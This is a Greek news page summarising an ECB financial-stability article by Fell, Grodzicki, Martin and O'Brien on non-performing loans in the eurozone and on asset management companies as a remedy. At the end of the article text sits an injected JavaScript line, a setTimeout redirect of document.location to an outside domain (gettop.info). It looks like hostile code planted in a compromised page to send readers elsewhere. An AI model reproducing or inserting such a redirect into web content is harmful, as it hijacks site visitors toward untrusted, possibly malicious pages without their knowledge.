ΕΚΤ: Άρθρο για τα «κόκκινα» δάνεια στην ευρωζώνη

0
6

 

Eιδικό άρθρο των John Fell, Maciej Grodzicki, Reiner Martin και Edward O’Brien, που έχει συμπεριληφθεί στην έκθεση χρηματοπιστωτικής σταθερότητας της Ευρωπαϊκής Κεντρικής Τράπεζας αναφέρεται στο ζήτημα των μη εξυπηρετούμενων δανείων των τραπεζών της Ευρωζώνης και τους τρόπους αντιμετώπισής του.

Στο άρθρο, υπό τον τίτλο: «Αντιμετωπίζοντας τις αδυναμίες της αγοράς στην εκκαθάριση των μη εξυπηρετούμενων δανείων στην Ευρωζώνης», υπογραμμίζεται ότι σήμερα δεν υπάρχουν στην Ευρωζώνη αγορές μη εξυπηρετούμενων δανείων (NPL) με βάθος και ρευστότητα.

Η διευκόλυνση της ανάπτυξης τέτοιων αγορών έχει την προοπτική «να αμβλύνει τις πιέσεις στις τράπεζες και να μετριάσει τους κινδύνους για τη χρηματοπιστωτική σταθερότητα που συνδέονται με τα υψηλά αποθέματα NPL», προστίθεται.

Σύμφωνα με το άρθρο, μέρος μίας συνολικής στρατηγικής για την αντιμετώπιση των NPLs μπορεί να είναι και η δημιουργία εταιρειών διαχείρισης ενεργητικού (asset management companies). setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here